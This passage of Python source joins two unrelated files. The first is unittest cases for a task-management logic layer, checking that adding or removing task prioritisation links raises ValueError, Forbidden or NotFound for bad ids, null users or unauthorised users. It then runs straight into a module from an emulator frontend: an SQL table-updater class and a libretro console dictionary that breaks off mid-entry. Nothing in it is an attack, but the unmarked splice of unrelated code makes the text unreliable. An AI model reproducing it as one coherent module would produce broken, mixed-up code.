        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))

        # expect
        self.assertRaises(ValueError, self.ll.do_add_prioritize_before_to_task,
                          t1.id, t2.id, None)

        # then
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))

    def test_user_not_authorized_for_task_raises_exception(self):
        # given
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t2.users.append(user)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))

        # expect
        self.assertRaises(Forbidden, self.ll.do_add_prioritize_before_to_task,
                          t1.id, t2.id, user)

        # then
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))

    def test_user_not_authorized_for_prioritize_before_raises_exception(self):
        # given
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))

        # expect
        self.assertRaises(Forbidden, self.ll.do_add_prioritize_before_to_task,
                          t1.id, t2.id, user)

        # then
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))

    def test_task_not_found_raises_exception(self):
        # given
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t2.users.append(user)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertIsNone(self.pl.get_task(t2.id + 1))

        # expect
        self.assertRaises(NotFound, self.ll.do_add_prioritize_before_to_task,
                          t2.id + 1, t2.id, user)

        # then
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertIsNone(self.pl.get_task(t2.id+1))

    def test_prioritize_before_not_found_raises_exception(self):
        # given
        t1 = self.pl.create_task('t1')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        self.pl.add(t1)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertIsNone(self.pl.get_task(t1.id + 1))

        # expect
        self.assertRaises(NotFound, self.ll.do_add_prioritize_before_to_task,
                          t1.id, t1.id + 1, user)

        # then
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertIsNone(self.pl.get_task(t1.id + 1))

    def test_remove_prioritize_before_removes_prioritize_before(self):

        # given
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        t1.prioritize_before.append(t2)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(1, len(t1.prioritize_before))
        self.assertEqual(1, len(t2.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertTrue(t2 in t1.prioritize_before)
        self.assertTrue(t1 in t2.prioritize_after)

        # when
        results = self.ll.do_remove_prioritize_before_from_task(t1.id, t2.id,
                                                                user)

        # then
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertIsNotNone(results)
        self.assertEqual([t1, t2], list(results))

    def test_if_prioritize_before_already_removed_still_succeeds(self):

        # given
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))

        # when
        results = self.ll.do_remove_prioritize_before_from_task(t1.id, t2.id,
                                                                user)

        # then
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertIsNotNone(results)
        self.assertEqual([t1, t2], list(results))

    def test_remove_prioritize_before_with_null_ids_raises_exception(self):
        # given
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        t1.prioritize_before.append(t2)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(1, len(t1.prioritize_before))
        self.assertEqual(1, len(t2.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertTrue(t2 in t1.prioritize_before)
        self.assertTrue(t1 in t2.prioritize_after)

        # expect
        self.assertRaises(ValueError,
                          self.ll.do_remove_prioritize_before_from_task,
                          None, t2.id, user)

        # expect
        self.assertRaises(ValueError,
                          self.ll.do_remove_prioritize_before_from_task,
                          t1.id, None, user)

        # expect
        self.assertRaises(ValueError,
                          self.ll.do_remove_prioritize_before_from_task,
                          None, None, user)

        # then
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(1, len(t1.prioritize_before))
        self.assertEqual(1, len(t2.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertTrue(t2 in t1.prioritize_before)
        self.assertTrue(t1 in t2.prioritize_after)

    def test_remove_prioritize_before_with_null_user_raises_exception(self):
        # given
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        t1.prioritize_before.append(t2)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(1, len(t1.prioritize_before))
        self.assertEqual(1, len(t2.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertTrue(t2 in t1.prioritize_before)
        self.assertTrue(t1 in t2.prioritize_after)

        # expect
        self.assertRaises(ValueError,
                          self.ll.do_remove_prioritize_before_from_task,
                          t1.id, t2.id, None)

        # then
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(1, len(t1.prioritize_before))
        self.assertEqual(1, len(t2.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertTrue(t2 in t1.prioritize_before)
        self.assertTrue(t1 in t2.prioritize_after)

    def test_remove_prioritize_before_user_unauthd_raises_exception(self):
        # given
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t2.users.append(user)
        t1.prioritize_before.append(t2)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()
        # note that this situation shouldn't happen anyways. a task shouldn't
        # be prioritized before another task unless both share a common set of
        # one or more authorized users

        # precondition
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(1, len(t1.prioritize_before))
        self.assertEqual(1, len(t2.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertTrue(t2 in t1.prioritize_before)
        self.assertTrue(t1 in t2.prioritize_after)

        # expect
        self.assertRaises(Forbidden,
                          self.ll.do_remove_prioritize_before_from_task,
                          t1.id, t2.id, user)

        # then
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(1, len(t1.prioritize_before))
        self.assertEqual(1, len(t2.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertTrue(t2 in t1.prioritize_before)
        self.assertTrue(t1 in t2.prioritize_after)

    def test_remove_user_not_authd_for_prioritizebefore_raises_exception(self):
        # given
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t1.prioritize_before.append(t2)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()
        # note that this situation shouldn't happen anyways. a task shouldn't
        # be prioritized before another task unless both share a common set of
        # one or more authorized users

        # precondition
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(1, len(t1.prioritize_before))
        self.assertEqual(1, len(t2.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertTrue(t2 in t1.prioritize_before)
        self.assertTrue(t1 in t2.prioritize_after)

        # expect
        self.assertRaises(Forbidden,
                          self.ll.do_remove_prioritize_before_from_task,
                          t1.id, t2.id, user)

        # then
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(1, len(t1.prioritize_before))
        self.assertEqual(1, len(t2.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertTrue(t2 in t1.prioritize_before)
        self.assertTrue(t1 in t2.prioritize_after)

    def test_remove_prioritize_before_task_not_found_raises_exception(self):
        # given
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t2.users.append(user)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertIsNone(self.pl.get_task(t2.id + 1))

        # expect
        self.assertRaises(NotFound,
                          self.ll.do_remove_prioritize_before_from_task,
                          t2.id + 1, t2.id, user)

        # then
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertIsNone(self.pl.get_task(t2.id+1))

    def test_remove_prioritize_before_when_not_found_raises_exception(self):
        # given
        t1 = self.pl.create_task('t1')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        self.pl.add(t1)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertIsNone(self.pl.get_task(t1.id + 1))

        # expect
        self.assertRaises(NotFound,
                          self.ll.do_remove_prioritize_before_from_task,
                          t1.id, t1.id + 1, user)

        # then
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertIsNone(self.pl.get_task(t1.id + 1))


class TaskPrioritizeAfterLogicLayerTest(unittest.TestCase):

    def setUp(self):
        self.ll = generate_ll()
        self.pl = self.ll.pl

    def test_add_prioritize_after_adds_prioritize_after(self):
        # given
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))

        # when
        results = self.ll.do_add_prioritize_after_to_task(t1.id, t2.id, user)

        # then
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(1, len(t1.prioritize_after))
        self.assertEqual(1, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertTrue(t2 in t1.prioritize_after)
        self.assertTrue(t1 in t2.prioritize_before)
        self.assertIsNotNone(results)
        self.assertEqual([t1, t2], list(results))

    def test_if_already_added_still_succeeds(self):
        # given
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        t1.prioritize_after.append(t2)
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(1, len(t1.prioritize_after))
        self.assertEqual(1, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertTrue(t2 in t1.prioritize_after)
        self.assertTrue(t1 in t2.prioritize_before)

        # when
        results = self.ll.do_add_prioritize_after_to_task(t1.id, t2.id, user)

        # then
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(1, len(t1.prioritize_after))
        self.assertEqual(1, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertTrue(t2 in t1.prioritize_after)
        self.assertTrue(t1 in t2.prioritize_before)
        self.assertIsNotNone(results)
        self.assertEqual([t1, t2], list(results))

    def test_null_ids_raises_exception(self):
        # given
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))

        # expect
        self.assertRaises(ValueError, self.ll.do_add_prioritize_after_to_task,
                          None, t2.id, user)

        # expect
        self.assertRaises(ValueError, self.ll.do_add_prioritize_after_to_task,
                          t1.id, None, user)

        # expect
        self.assertRaises(ValueError, self.ll.do_add_prioritize_after_to_task,
                          None, None, user)

        # then
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))

    def test_null_user_raises_exception(self):
        # given
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))

        # expect
        self.assertRaises(ValueError, self.ll.do_add_prioritize_after_to_task,
                          t1.id, t2.id, None)

        # then
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))

    def test_user_not_authorized_for_task_raises_exception(self):
        # given
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t2.users.append(user)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))

        # expect
        self.assertRaises(Forbidden, self.ll.do_add_prioritize_after_to_task,
                          t1.id, t2.id, user)

        # then
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))

    def test_user_not_authorized_for_prioritize_after_raises_exception(self):
        # given
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))

        # expect
        self.assertRaises(Forbidden, self.ll.do_add_prioritize_after_to_task,
                          t1.id, t2.id, user)

        # then
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))

    def test_task_not_found_raises_exception(self):
        # given
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t2.users.append(user)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertIsNone(self.pl.get_task(t2.id + 1))

        # expect
        self.assertRaises(NotFound, self.ll.do_add_prioritize_after_to_task,
                          t2.id + 1, t2.id, user)

        # then
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertIsNone(self.pl.get_task(t2.id+1))

    def test_prioritize_after_not_found_raises_exception(self):
        # given
        t1 = self.pl.create_task('t1')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        self.pl.add(t1)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertIsNone(self.pl.get_task(t1.id + 1))

        # expect
        self.assertRaises(NotFound, self.ll.do_add_prioritize_after_to_task,
                          t1.id, t1.id + 1, user)

        # then
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertIsNone(self.pl.get_task(t1.id + 1))

    def test_remove_prioritize_after_removes_prioritize_after(self):

        # given
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        t1.prioritize_after.append(t2)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(1, len(t1.prioritize_after))
        self.assertEqual(1, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertTrue(t2 in t1.prioritize_after)
        self.assertTrue(t1 in t2.prioritize_before)

        # when
        results = self.ll.do_remove_prioritize_after_from_task(t1.id, t2.id,
                                                               user)

        # then
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertIsNotNone(results)
        self.assertEqual([t1, t2], list(results))

    def test_if_prioritize_after_already_removed_still_succeeds(self):

        # given
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))

        # when
        results = self.ll.do_remove_prioritize_after_from_task(t1.id, t2.id,
                                                               user)

        # then
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertIsNotNone(results)
        self.assertEqual([t1, t2], list(results))

    def test_remove_prioritize_after_with_null_ids_raises_exception(self):
        # given
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        t1.prioritize_after.append(t2)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(1, len(t1.prioritize_after))
        self.assertEqual(1, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertTrue(t2 in t1.prioritize_after)
        self.assertTrue(t1 in t2.prioritize_before)

        # expect
        self.assertRaises(ValueError,
                          self.ll.do_remove_prioritize_after_from_task,
                          None, t2.id, user)

        # expect
        self.assertRaises(ValueError,
                          self.ll.do_remove_prioritize_after_from_task,
                          t1.id, None, user)

        # expect
        self.assertRaises(ValueError,
                          self.ll.do_remove_prioritize_after_from_task,
                          None, None, user)

        # then
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(1, len(t1.prioritize_after))
        self.assertEqual(1, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertTrue(t2 in t1.prioritize_after)
        self.assertTrue(t1 in t2.prioritize_before)

    def test_remove_prioritize_after_with_null_user_raises_exception(self):
        # given
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        t1.prioritize_after.append(t2)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(1, len(t1.prioritize_after))
        self.assertEqual(1, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertTrue(t2 in t1.prioritize_after)
        self.assertTrue(t1 in t2.prioritize_before)

        # expect
        self.assertRaises(ValueError,
                          self.ll.do_remove_prioritize_after_from_task,
                          t1.id, t2.id, None)

        # then
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(1, len(t1.prioritize_after))
        self.assertEqual(1, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertTrue(t2 in t1.prioritize_after)
        self.assertTrue(t1 in t2.prioritize_before)

    def test_rem_prioritize_after_user_unauthd_for_task_raises_exception(self):
        # given
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t2.users.append(user)
        t1.prioritize_after.append(t2)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()
        # note that this situation shouldn't happen anyways. a task shouldn't
        # be prioritized before another task unless both share a common set of
        # one or more authorized users

        # precondition
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(1, len(t1.prioritize_after))
        self.assertEqual(1, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertTrue(t2 in t1.prioritize_after)
        self.assertTrue(t1 in t2.prioritize_before)

        # expect
        self.assertRaises(Forbidden,
                          self.ll.do_remove_prioritize_after_from_task,
                          t1.id, t2.id, user)

        # then
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(1, len(t1.prioritize_after))
        self.assertEqual(1, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertTrue(t2 in t1.prioritize_after)
        self.assertTrue(t1 in t2.prioritize_before)

    def test_remove_user_not_authd_for_prioritize_after_raises_exception(self):
        # given
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t1.prioritize_after.append(t2)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()
        # note that this situation shouldn't happen anyways. a task shouldn't
        # be prioritized before another task unless both share a common set of
        # one or more authorized users

        # precondition
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(1, len(t1.prioritize_after))
        self.assertEqual(1, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertTrue(t2 in t1.prioritize_after)
        self.assertTrue(t1 in t2.prioritize_before)

        # expect
        self.assertRaises(Forbidden,
                          self.ll.do_remove_prioritize_after_from_task,
                          t1.id, t2.id, user)

        # then
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(1, len(t1.prioritize_after))
        self.assertEqual(1, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertTrue(t2 in t1.prioritize_after)
        self.assertTrue(t1 in t2.prioritize_before)

    def test_remove_prioritize_after_task_not_found_raises_exception(self):
        # given
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t2.users.append(user)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertIsNone(self.pl.get_task(t2.id + 1))

        # expect
        self.assertRaises(NotFound,
                          self.ll.do_remove_prioritize_after_from_task,
                          t2.id + 1, t2.id, user)

        # then
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertIsNone(self.pl.get_task(t2.id+1))

    def test_remove_prioritize_after_when_not_found_raises_exception(self):
        # given
        t1 = self.pl.create_task('t1')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        self.pl.add(t1)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertIsNone(self.pl.get_task(t1.id + 1))

        # expect
        self.assertRaises(NotFound,
                          self.ll.do_remove_prioritize_after_from_task,
                          t1.id, t1.id + 1, user)

        # then
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertIsNone(self.pl.get_task(t1.id + 1))

import os

from collections import OrderedDict

from .sqldatabase import SqlDatabase
from .retrieve_core_info import retrieveCoreInfo

# Root class that all SQL table updaters derive from
class SqlTableUpdater():

    def __init__(self, tableName, tableColumns=[], coreInfo={}):
        self.tableName = tableName
        self.columnsDict = OrderedDict(tableColumns)
        self.dbFile = os.path.join(os.getcwd().replace("python", "metadata"), "libretro.sqlite")
        self.dbFileExists = os.path.isfile(self.dbFile)
        self.coreInfo = coreInfo

        # self.filterUnusedCores()

    def updateTable(self):
        pass

    def updateColumns(self, database, additionalStatement: str = ""):

        if not self.dbFileExists:
            database.createTable(self.tableName, self.columnsDict, additionalStatement)
        else:
            try:
                database.deleteTable(self.tableName)
            except:
                database.createTable(self.tableName, self.columnsDict, additionalStatement)

    def __del__(self):
        print("Updated " + self.tableName + " table.")

    def libretroSystemList(self):
        systems = []
        for k, v in self.coreInfo['cores'].items():

            if "categories" not in v or v["categories"] != "Emulator":
                continue

            if "database" in v:
                name = v["database"].split("|")

                for n in name:
                    systems.append(n)

                    # Split console and manufacturer names
                    # Not really necessary for Libretro identifiers
                    #tup = n.split(" - ")
                    #
                    ## "MAME"
                    #if len(tup) == 1:
                    #    systems.append(tup[0])
                    #
                    ## Nearly every one
                    #elif len(tup) == 2:
                    #    systems.append(tup[1])
                    #
                    ## Sega - Master System - Mark III
                    ## Sega - Mega Drive - Genesis
                    #elif len(tup) == 3:
                    #    systems.append(tup[1])

            # There are some cores that do not have "database" defined
            elif "systemname" in v:
                systems.append(v["systemname"])

        systems = list(set(systems))
        systems.sort()
        return systems

    # This map defines all Libretro-based systems that Phoenix supports. If it isn't in here, it isn't supported by Phoenix!
    # TODO: Place this information into an entirely separate database
    # WARNING: Do NOT change Phoenix UUIDs (1st column), even if there are spelling mistakes. Change friendlyName if you really need to.
    phoenixSystemDatabase = {
    # friendlyName: North American console name without manufacturer
    # shortName: Abbreviation (typically 3 letters)
    # enabled: True iff a core is available, Phoenix can run it, and the game scanner can find it (extensions set)

        # Everything else
        "Arcade":                                           {"enabled": False, "defaultCore": "mame_libretro",                      "friendlyName": "",                    "shortName": "", "manufacturer": "(Various)"       },

        # Conspicuously missing from No-Intro
        "Amstrad - CPC":                                    {"enabled": False, "defaultCore": "cap32_libretro",                     "friendlyName": "",                    "shortName": "", "manufacturer": "Amstrad"         },
        "Atari - 2600":                                     {"enabled": True,  "defaultCore": "stella_libretro",                    "friendlyName": "",                    "shortName": "", "manufacturer": "Atari"           },
        "Capcom - CP System I":                             {"enabled": False, "defaultCore": "fb_alpha_cps1_libretro",             "friendlyName": "",                    "shortName": "", "manufacturer": "Capcom"          },
        "Capcom - CP System II":                            {"enabled": False, "defaultCore": "fb_alpha_cps2_libretro",             "friendlyName": "",                    "shortName": "", "manufacturer": "Capcom"          },
        "Capcom - CP System III":                           {"enabled": False, "defaultCore": "fbalpha2012_cps3_libretro",          "friendlyName": "",                    "shortName": "", "manufacturer": "Capcom"          },
        "Capcom - CPS Changer":                             {"enabled": False, "defaultCore": "mess2014_libretro",                  "friendlyName": "",                    "shortName": "", "manufacturer": "Capcom"          },
        "CHIP-8":                                           {"enabled": False, "defaultCore": "emux_chip8_libretro",                "friendlyName": "",                    "shortName": "", "manufacturer": "(Various)"       },
        "DOS":                                              {"enabled": False, "defaultCore": "dosbox_libretro",                    "friendlyName": "",                    "shortName": "", "manufacturer": "(Various)"       },
        "Mattel - Intellivision":                           {"enabled": False, "defaultCore": "mess2014_libretro",                  "friendlyName": "",                    "shortName": "", "manufacturer": "Mattel"          },
        "Nintendo - Game & Watch":                          {"enabled": False, "defaultCore": "gw_libretro",                        "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
